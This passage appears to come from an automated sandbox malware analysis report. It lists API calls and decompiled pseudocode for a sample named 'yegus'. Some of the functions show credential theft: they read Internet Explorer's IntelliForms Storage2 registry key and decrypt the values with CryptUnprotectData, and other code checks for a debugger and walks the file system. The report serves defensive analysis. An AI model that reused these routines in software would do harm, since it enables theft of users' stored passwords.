    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,10088306,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 1008647B
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 100044E0, Relevance: 1.3, APIs: 1, Instructions: 8
    APIs
    • HeapFree.KERNEL32(00000000,?), ref: 100044EE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd

    Non-executed Functions

    Function 100010C0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 109encryption
    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,771CBFF8,76F846E9,00000000), ref: 10001116
    • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 10001130
    • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 10001141
    • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 1000114E
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 10001159
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000014,00000000,?,00000000), ref: 10001181
    • wsprintfA.USER32 ref: 1000119D
    • wsprintfA.USER32 ref: 100011C6
    • CryptDestroyHash.ADVAPI32(00000000), ref: 100011D2
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 100011DD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10001200, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175stringencryption
    APIs
    • lstrlenW.KERNEL32(00000000,?,00000000,76F846E9), ref: 1000125A
      • Part of subcall function 100010C0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,771CBFF8,76F846E9,00000000), ref: 10001116
      • Part of subcall function 100010C0: CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 10001130
      • Part of subcall function 100010C0: CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 10001141
      • Part of subcall function 100010C0: CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 1000114E
      • Part of subcall function 100010C0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 10001159
      • Part of subcall function 100010C0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000014,00000000,?,00000000), ref: 10001181
      • Part of subcall function 100010C0: wsprintfA.USER32 ref: 1000119D
      • Part of subcall function 100010C0: wsprintfA.USER32 ref: 100011C6
      • Part of subcall function 100010C0: CryptDestroyHash.ADVAPI32(00000000), ref: 100011D2
      • Part of subcall function 100010C0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 100011DD
      • Part of subcall function 10082020: RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000101,10001298,76F846E9,00000000), ref: 10082057
      • Part of subcall function 10082020: RegQueryValueExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000000), ref: 10082086
      • Part of subcall function 10082020: HeapAlloc.KERNEL32(00000008,-00000004,771CBFF8), ref: 100820A8
      • Part of subcall function 10082020: RegQueryValueExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000000), ref: 100820CB
      • Part of subcall function 10082020: HeapFree.KERNEL32(00000000,00000000), ref: 100820E9
      • Part of subcall function 10082020: RegCloseKey.ADVAPI32(00000000), ref: 100820F8
    • lstrlenW.KERNEL32(00000000), ref: 100012FF
    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000132B
    • HeapFree.KERNEL32(00000000,00000000), ref: 1000133E
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001355
      • Part of subcall function 10082210: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000014,00000010,?,1000140A), ref: 10082228
      • Part of subcall function 10082210: HeapAlloc.KERNEL32(00000008,0000000A), ref: 10082240
      • Part of subcall function 10082210: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10082258
      • Part of subcall function 10082210: HeapFree.KERNEL32(00000000,00000000), ref: 1008226E
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001474
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTCRED>,00000000,00000000,00000000,?), ref: 10001021
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTPASS>,00000000), ref: 1000104D
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<ENDCRED>,00000000), ref: 10001075
      • Part of subcall function 10001000: lstrlenW.KERNEL32(10094C54), ref: 10001093
    • HeapFree.KERNEL32(00000000,00000000), ref: 1000144E
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001465
    • LocalFree.KERNEL32(00000000), ref: 1000147D
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10082020, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 86registry
    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000101,10001298,76F846E9,00000000), ref: 10082057
    • RegQueryValueExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000000), ref: 10082086
    • HeapAlloc.KERNEL32(00000008,-00000004,771CBFF8), ref: 100820A8
    • RegQueryValueExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000000), ref: 100820CB
    • HeapFree.KERNEL32(00000000,00000000), ref: 100820E9
    • RegCloseKey.ADVAPI32(00000000), ref: 100820F8
    Strings
    • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 10082036
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10036CD0, Relevance: 12.0, Strings: 9, Instructions: 711
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 100804F0, Relevance: 11.8, Strings: 9, Instructions: 529
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10065870, Relevance: 9.5, Strings: 6, Instructions: 2045
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10005C30, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 647
    APIs
    • __aulldiv.INT64 ref: 10005E3B
    • __aullrem.INT64 ref: 10005E67
    • __aulldvrm.INT64 ref: 10005EC6
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10006022, Relevance: 6.8, Strings: 5, Instructions: 587
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10053C80, Relevance: 6.3, Strings: 4, Instructions: 1291
    Strings
    • %d values for %d columns, xrefs: 100543B0
    • table %S has %d columns but %d values were supplied, xrefs: 100542A4
    • rows inserted, xrefs: 10054D84
    • table %S has no column named %s, xrefs: 10054336
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 013346A3, Relevance: 6.1, APIs: 4, Instructions: 75
    C-Code - Quality: 85%
    			E013346A3(intOrPtr __edx, intOrPtr __edi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				_Unknown_base(*)()* _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t38;
				long _t48;
				signed int _t50;
				intOrPtr _t51;
				signed char _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;

				_t57 = __edi;
				_t56 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				 *0x1347bd0 = 0;
				_v632 = E01336200(_t57,  &_v808, 0, 0x2cc);
				_v636 = _t55;
				_v640 = _t56;
				_v644 = _t51;
				_v648 = 0;
				_v652 = _t57;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t38 =  &_v0;
				_v612 = _t38;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t38 - 4));
				E01336200(_t57,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t48 = UnhandledExceptionFilter( &_v12);
				if(_t48 == 0) {
					_t50 =  ~(_t54 & 0x000000ff);
					asm("sbb eax, eax");
					 *0x1347bd0 =  *0x1347bd0 & _t50;
					return _t50;
				}
				return _t48;
			}

































    0x013346a3
    0x013346a3
    0x013346b7
    0x013346b9
    0x013346bc
    0x013346bc
    0x013346cd
    0x013346db
    0x013346e1
    0x013346e7
    0x013346ed
    0x013346f3
    0x013346f9
    0x013346ff
    0x01334706
    0x0133470d
    0x01334714
    0x0133471b
    0x01334722
    0x01334729
    0x0133472a
    0x01334733
    0x01334739
    0x0133473c
    0x01334742
    0x01334751
    0x0133475c
    0x01334767
    0x0133476e
    0x01334775
    0x0133477f
    0x01334787
    0x01334790
    0x01334792
    0x01334795
    0x01334797
    0x013347a1
    0x013347a9
    0x013347ae
    0x013347b0
    0x013347b2
    0x00000000
    0x013347b2
    0x013347bd

    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 013346B0
    • IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 01334778
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01334797
    • UnhandledExceptionFilter.KERNEL32(?), ref: 013347A1
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10074780, Relevance: 5.9, Strings: 4, Instructions: 911
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10027050, Relevance: 5.7, Strings: 4, Instructions: 686
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1001EBB0, Relevance: 5.3, Strings: 3, Instructions: 1523
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1006F810, Relevance: 5.1, Strings: 2, Instructions: 2580
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 100879B6, Relevance: 4.9, APIs: 3, Instructions: 370
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1001CFF0, Relevance: 4.3, Strings: 3, Instructions: 531
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10029130, Relevance: 4.2, Strings: 3, Instructions: 497
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10021F80, Relevance: 4.1, Strings: 3, Instructions: 362
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01339A82, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127
    C-Code - Quality: 71%
    			E01339A82(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				signed int _v32;
				WCHAR* _v36;
				signed int _v48;
				intOrPtr _v556;
				intOrPtr _v558;
				struct _WIN32_FIND_DATAW _v604;
				intOrPtr* _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _v644;
				intOrPtr _v648;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				signed int _t51;
				signed char _t53;
				signed int _t62;
				void* _t64;
				union _FINDEX_INFO_LEVELS _t66;
				signed int _t71;
				intOrPtr* _t72;
				signed int _t75;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t89;
				WCHAR* _t90;
				void* _t91;
				intOrPtr* _t94;
				intOrPtr _t97;
				void* _t99;
				signed int _t100;
				intOrPtr* _t104;
				signed int _t107;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				void* _t114;
				void* _t115;
				signed int _t117;
				void* _t118;
				union _FINDEX_INFO_LEVELS _t119;
				void* _t120;
				void* _t123;
				void* _t124;
				void* _t125;
				signed int _t126;
				void* _t127;
				void* _t128;
				signed int _t132;
				void* _t133;
				signed int _t134;
				void* _t135;
				void* _t136;

				_push(__ecx);
				_t94 = _a4;
				_t2 = _t94 + 2; // 0x2
				_t110 = _t2;
				do {
					_t40 =  *_t94;
					_t94 = _t94 + 2;
				} while (_t40 != 0);
				_t117 = _a12;
				_t97 = (_t94 - _t110 >> 1) + 1;
				_v8 = _t97;
				if(_t97 <= (_t40 | 0xffffffff) - _t117) {
					_t5 = _t117 + 1; // 0x1
					_t89 = _t5 + _t97;
					_t124 = E013388CF(_t97, _t89, 2);
					_t99 = _t123;
					__eflags = _t117;
					if(_t117 == 0) {
						L6:
						_push(_v8);
						_t89 = _t89 - _t117;
						_t45 = E01339892(_t99, _t124 + _t117 * 2, _t89, _a4);
						_t134 = _t133 + 0x10;
						__eflags = _t45;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t82 = E01339CFB(_a16, __eflags, _t124);
							E01338804(0);
							_t84 = _t82;
							goto L8;
						}
					} else {
						_push(_t117);
						_t85 = E01339892(_t99, _t124, _t89, _a8);
						_t134 = _t133 + 0x10;
						__eflags = _t85;
						if(_t85 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E013374D2();
							asm("int3");
							_t132 = _t134;
							_t135 = _t134 - 0x260;
							_t48 =  *0x1347004; // 0x262637d3
							_v48 = _t48 ^ _t132;
							_t111 = _v28;
							_t100 = _v32;
							_push(_t89);
							_t90 = _v36;
							_push(_t124);
							_push(_t117);
							_t125 = 0x5c;
							_v644 = _t111;
							_v648 = 0x2f;
							_t118 = 0x3a;
							while(1) {
								__eflags = _t100 - _t90;
								if(_t100 == _t90) {
									break;
								}
								_t50 =  *_t100 & 0x0000ffff;
								__eflags = _t50 - _v612;
								if(_t50 != _v612) {
									__eflags = _t50 - _t125;
									if(_t50 != _t125) {
										__eflags = _t50 - _t118;
										if(_t50 != _t118) {
											_t100 = _t100 - 2;
											__eflags = _t100;
											continue;
										}
									}
								}
								break;
							}
							_t126 =  *_t100 & 0x0000ffff;
							__eflags = _t126 - _t118;
							if(_t126 != _t118) {
								L19:
								_t51 = _t126;
								_t119 = 0;
								_t112 = 0x2f;
								__eflags = _t51 - _t112;
								if(_t51 == _t112) {
									L23:
									_t53 = 1;
									__eflags = 1;
								} else {
									_t114 = 0x5c;
									__eflags = _t51 - _t114;
									if(_t51 == _t114) {
										goto L23;
									} else {
										_t115 = 0x3a;
										__eflags = _t51 - _t115;
										if(_t51 == _t115) {
											goto L23;
										} else {
											_t53 = 0;
										}
									}
								}
								_t103 = (_t100 - _t90 >> 1) + 1;
								asm("sbb eax, eax");
								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
								E01336200(_t119,  &_v604, _t119, 0x250);
								_t136 = _t135 + 0xc;
								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119);
								__eflags = _t127 - 0xffffffff;
								if(_t127 != 0xffffffff) {
									_t104 = _v608;
									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
									__eflags = _t62;
									_v616 = _t62 >> 2;
									_t64 = 0x2e;
									do {
										__eflags = _v604.cFileName - _t64;
										if(_v604.cFileName != _t64) {
											L36:
											_push(_t104);
											_t66 = E01339A82(_t104,  &(_v604.cFileName), _t90, _v612);
											_t136 = _t136 + 0x10;
											__eflags = _t66;
											if(_t66 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											__eflags = _v558 - _t119;
											if(_v558 == _t119) {
												goto L37;
											} else {
												__eflags = _v558 - _t64;
												if(_v558 != _t64) {
													goto L36;
												} else {
													__eflags = _v556 - _t119;
													if(_v556 == _t119) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t71 = FindNextFileW(_t127,  &_v604);
										_t104 = _v608;
										__eflags = _t71;
										_t64 = 0x2e;
									} while (_t71 != 0);
									_t72 = _t104;
									_t107 = _v616;
									_t113 =  *_t72;
									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
									__eflags = _t107 - _t75;
									if(_t107 != _t75) {
										E0133CB70(_t90, _t113 + _t107 * 4, _t75 - _t107, 4, E0133989D);
									}
								} else {
									_push(_v608);
									_t66 = E01339A82(_t103, _t90, _t119, _t119);
									L26:
									_t119 = _t66;
								}
								__eflags = _t127 - 0xffffffff;
								if(_t127 != 0xffffffff) {
									FindClose(_t127);
								}
							} else {
								__eflags = _t100 -  &(_t90[1]);
								if(_t100 ==  &(_t90[1])) {
									goto L19;
								} else {
									_push(_t111);
									E01339A82(_t100, _t90, 0, 0);
								}
							}
							_pop(_t120);
							_pop(_t128);
							__eflags = _v12 ^ _t132;
							_pop(_t91);
							return E01333E82(_t91, _v12 ^ _t132, _t120, _t128);
						} else {
							goto L6;
						}
					}
				} else {
					_t84 = 0xc;
					L8:
					return _t84;
				}
				L40:
			}
































































    0x01339a87
    0x01339a88
    0x01339a8f
    0x01339a8f
    0x01339a92
    0x01339a92
    0x01339a95
    0x01339a98
    0x01339a9d
    0x01339aa7
    0x01339aaa
    0x01339aaf
    0x01339ab7
    0x01339aba
    0x01339ac4
    0x01339ac7
    0x01339ac8
    0x01339aca
    0x01339ade
    0x01339ade
    0x01339ae1
    0x01339aeb
    0x01339af0
    0x01339af3
    0x01339af5
    0x00000000
    0x01339af7
    0x01339afb
    0x01339b04
    0x01339b0a
    0x00000000
    0x01339b0c
    0x01339acc
    0x01339acc
    0x01339ad2
    0x01339ad7
    0x01339ada
    0x01339adc
    0x01339b13
    0x01339b15
    0x01339b16
    0x01339b17
    0x01339b18
    0x01339b19
    0x01339b1a
    0x01339b1f
    0x01339b23
    0x01339b25
    0x01339b2b
    0x01339b32
    0x01339b35
    0x01339b38
    0x01339b3b
    0x01339b3c
    0x01339b3f
    0x01339b40
    0x01339b43
    0x01339b46
    0x01339b4c
    0x01339b56
    0x01339b72
    0x01339b72
    0x01339b74
    0x00000000
    0x00000000
    0x01339b59
    0x01339b5c
    0x01339b63
    0x01339b65
    0x01339b68
    0x01339b6a
    0x01339b6d
    0x01339b6f
    0x01339b6f
    0x00000000
    0x01339b6f
    0x01339b6d
    0x01339b68
    0x00000000
    0x01339b63
    0x01339b76
    0x01339b79
    0x01339b7c
    0x01339b98
    0x01339b9a
    0x01339b9c
    0x01339b9e
    0x01339b9f
    0x01339ba2
    0x01339bb8
    0x01339bba
    0x01339bba
    0x01339ba4
    0x01339ba6
    0x01339ba7
    0x01339baa
    0x00000000
    0x01339bac
    0x01339bae
    0x01339baf
    0x01339bb2
    0x00000000
    0x01339bb4
    0x01339bb4
    0x01339bb4
    0x01339bb2
    0x01339baa
    0x01339bc2
    0x01339bca
    0x01339bce
    0x01339bdc
    0x01339be1
    0x01339bf6
    0x01339bf8
    0x01339bfb
    0x01339c30
    0x01339c3b
    0x01339c3b
    0x01339c40
    0x01339c46
    0x01339c47
    0x01339c47
    0x01339c4e
    0x01339c6b
    0x01339c6b
    0x01339c7a
    0x01339c7f
    0x01339c82
    0x01339c84
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x01339c50
    0x01339c50
    0x01339c57
    0x00000000
    0x01339c59
    0x01339c59
    0x01339c60
    0x00000000
    0x01339c62
    0x01339c62
    0x01339c69
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x01339c69
    0x01339c60
    0x01339c57
    0x00000000
    0x01339c86
    0x01339c8e
    0x01339c94
    0x01339c9a
    0x01339c9e
    0x01339c9e
    0x01339ca1
    0x01339ca3
    0x01339ca9
    0x01339cb0
    0x01339cb3
    0x01339cb5
    0x01339cc9
    0x01339cce
    0x01339bfd
    0x01339c03
    0x01339c07
    0x01339c0f
    0x01339c0f
    0x01339c0f
    0x01339c11
    0x01339c14
    0x01339c17
    0x01339c17
    0x01339b7e
    0x01339b81
    0x01339b83
    0x00000000
    0x01339b85
    0x01339b85
    0x01339b8b
    0x01339b90
    0x01339b83
    0x01339c22
    0x01339c23
    0x01339c24
    0x01339c26
    0x01339c2f
    0x00000000
    0x00000000
    0x00000000
    0x01339adc
    0x01339ab1
    0x01339ab3
    0x01339b0d
    0x01339b12
    0x01339b12
    0x00000000

    APIs
      • Part of subcall function 013388CF: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,013395CD,00000001,00000364,?,?,01332133,?), ref: 01338910
      • Part of subcall function 013374D2: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 013374D4
      • Part of subcall function 013374D2: GetCurrentProcess.KERNEL32(C0000417,0133889C,00000016,0133959B,?,?,00000000,00000000,?,00000000,?,013338A4,00000000,?,?,00000000), ref: 013374F6
